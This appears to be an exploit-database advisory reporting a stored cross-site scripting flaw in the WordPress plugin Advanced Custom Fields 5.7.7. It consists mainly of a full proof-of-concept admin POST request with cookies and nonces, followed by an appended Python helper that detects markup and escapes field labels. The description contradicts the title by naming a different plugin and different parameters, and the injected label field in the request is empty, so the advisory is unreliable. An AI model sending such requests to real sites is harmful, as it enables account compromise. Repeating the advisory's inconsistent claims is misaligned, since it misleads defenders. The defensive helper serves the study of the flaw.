WordPress Plugin Advanced-Custom-Fields 5.7.7 - Cross-Site Scripting

2018-12-03 10:36:57

# Exploit Title: Wordpress Plugins Advanced-custom-fields 5.7.7 - Cross-Site Scripting
# Google Dork: N/A
# Date: 2018-12-02
# Exploit Author: Loading Kura Kura
# Vendor Homepage: https://www.advancedcustomfields.com/
# Software Link: https://www.advancedcustomfields.com/
# Version: 5.7.7
# Tested on: Win10 x64/Kali linux x64
# CVE : N/A

# Description:
# A stored cross-site scripting (XSS) vulnerability was discovered in the WordPress plugin Easy Testimonials 3.2.
# Three parameters (_ikcf_client, _ikcf_position, _ikcf_other) are affected by cross-site scripting.

# Parameter: acf_fields[11][label]
# PoC

POST /wordpress/wp-admin/post.php HTTP/1.1
Host: localhost
Content-Length: 2838
Cache-Control: max-age=0
Origin: http://localhost
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://localhost/wordpress/wp-admin/post.php?post=8&action=edit
Accept-Encoding: gzip, deflate
Accept-Language: id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7,da;q=0.6
Cookie: wordpress_bbfa5b726c6b7a9cf3cda9370be3ee91=admin|1543850245|LBSY8ANOj9TKCX2YpnzKJoZ5N75oRW4ZGkZZrw5INPt|74dd4284fad8e2f658d13db3d669d0d61976654b4b9e7b4a820b0156fb018264; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_bbfa5b726c6b7a9cf3cda9370be3ee91=admin|1543850245|LBSY8ANOj9TKCX2YpnzKJoZ5N75oRW4ZGkZZrw5INPt|d0b0455678fae203a81b5c23b42dbfa51b0ab665e33607d2b09b1d5d62cc36be; wp-settings-time-1=1543678278; wp-settings-1=mfold=o; hblid=gR3SowbFiR0QuMDg3m39N0I6Bo2jr38A; olfsk=olfsk8076045099904943; _gcl_au=1.1.201976856.1543314650
Connection: close

_wpnonce=415211ddca&_wp_http_referer=/wordpress/wp-admin/post.php?post=8&action=edit&message=1&user_ID=1&action=editpost&originalaction=editpost&post_author=1&post_type=acf-field-group&original_post_status=publish&referredby=http://localhost/wordpress/wp-admin/post.php?post=8&action=edit&_wp_original_http_referer=http://localhost/wordpress/wp-admin/post.php?post=8&action=edit&post_ID=8&meta-box-order-nonce=2cc12cc441&closedpostboxesnonce=bbd0be706b&post_title=xss&samplepermalinknonce=4f1f2ec280&_acf_screen=field_group&_acf_post_id=8&_acf_nonce=191e753914&_acf_validation=0&_acf_changed=1&_acf_delete_fields=0|9&original_publish=Update&save=Update&acf_fields[11][ID]=11&acf_fields[11][key]=field_5c02a79cc0f83&acf_fields[11][parent]=8&acf_fields[11][menu_order]=0&acf_fields[11][save]=settings&acf_fields[11][label]=&acf_fields[11][name]=&acf_fields[11][type]=text&acf_fields[11][instructions]=&acf_fields[11][required]=0&acf_fields[11][required]=1&acf_fields[11][default_value]=&acf_fields[11][placeholder]=&acf_fields[11][prepend]=&acf_fields[11][append]=&acf_fields[11][maxlength]=&acf_fields[11][conditional_logic]=0&acf_fields[11][wrapper][width]=&acf_fields[11][wrapper][class]=&acf_fields[11][wrapper][id]=&acf_fields[10][ID]=10&acf_fields[10][key]=field_5c02a7abc0f84&acf_fields[10][parent]=8&acf_fields[10][menu_order]=1&acf_fields[10][save]=meta&acf_fields[12][ID]=12&acf_fields[12][key]=field_5c02a7abc0f84&acf_fields[12][parent]=8&acf_fields[12][menu_order]=2&acf_fields[12][save]=meta&acf_field_group[location][group_0][rule_0][param]=post_type&acf_field_group[location][group_0][rule_0][operator]===&acf_field_group[location][group_0][rule_0][value]=post&acf_field_group[location][group_0][rule_1][param]=post_type&acf_field_group[location][group_0][rule_1][operator]===&acf_field_group[location][group_0][rule_1][value]=post&acf_field_group[active]=0&acf_field_group[active]=1&acf_field_group[style]=default&acf_field_group[position]=normal&acf_field_group[label_placement]=top&acf_field_group[instruction_placement]=label&acf_field_group[menu_order]=0&acf_field_group[description]=ddd&acf_field_group[hide_on_screen]=&acf_field_group[hide_on_screen][]=the_content&acf_field_group[key]=group_5c02a6cfa31d6&post_name=group_5c02a6cfa31d6
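As an added example (not part of the advisory or of the plugin's code), the Python helper below expands the PoC's PHP-style bracketed parameters the way $_POST does, flags any submitted value that carries markup, and shows the HTML-escaped form a template must emit for a stored field label; html.escape stands in for WordPress's esc_html/esc_attr, and the request body is a constructed sample that mirrors the PoC's key structure.

```python
"""Audit a WordPress admin POST body for markup in stored field settings."""
import html
import re
from urllib.parse import parse_qsl

# Constructed sample body: same key layout as the advisory's PoC, with a
# harmless marker placed in the acf_fields[11][label] parameter it names.
SAMPLE_BODY = (
    "post_ID=8&post_type=acf-field-group"
    "&acf_fields[11][ID]=11&acf_fields[11][type]=text"
    "&acf_fields[11][label]=%3Cb%3Eclient%3C%2Fb%3E&acf_fields[11][name]=client"
    "&acf_field_group[location][group_0][rule_0][param]=post_type"
    "&acf_field_group[hide_on_screen]=&acf_field_group[hide_on_screen][]=the_content"
)

_KEY_RE = re.compile(r"^([^\[]+)((?:\[[^\]]*\])*)$")
_MARKUP_RE = re.compile(r"<\s*/?[a-z!]", re.I)  # an opening or closing tag start


def parse_php_body(body: str) -> dict:
    """Expand 'a[b][c]=v' into {'a': {'b': {'c': 'v'}}} and 'a[]=v' into a list,
    mirroring how PHP populates $_POST from an urlencoded body."""
    root: dict = {}
    for key, value in parse_qsl(body, keep_blank_values=True):
        m = _KEY_RE.match(key)
        if not m:
            continue
        parts = [m.group(1)] + re.findall(r"\[([^\]]*)\]", m.group(2))
        append = parts[-1] == ""          # trailing [] means "push onto array"
        if append:
            parts = parts[:-1]
        node = root
        for part in parts[:-1]:           # walk/create intermediate arrays
            nxt = node.get(part)
            if not isinstance(nxt, dict):
                nxt = node[part] = {}
            node = nxt
        leaf = parts[-1]
        if append:
            if not isinstance(node.get(leaf), list):
                node[leaf] = []           # a scalar set earlier is replaced, as in PHP
            node[leaf].append(value)
        else:
            node[leaf] = value
    return root


def find_markup(tree, path=()):
    """Yield (slash-joined path, value) for every leaf that looks like HTML."""
    if isinstance(tree, dict):
        for k, v in tree.items():
            yield from find_markup(v, path + (k,))
    elif isinstance(tree, list):
        for i, v in enumerate(tree):
            yield from find_markup(v, path + (str(i),))
    elif _MARKUP_RE.search(tree):
        yield "/".join(path), tree


def escaped_labels(tree) -> dict:
    """Field labels as a template must render them: entity-encoded, so stored
    text is displayed as text instead of becoming markup in the admin page."""
    return {fid: html.escape(f.get("label", ""), quote=True)
            for fid, f in tree.get("acf_fields", {}).items()}
```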
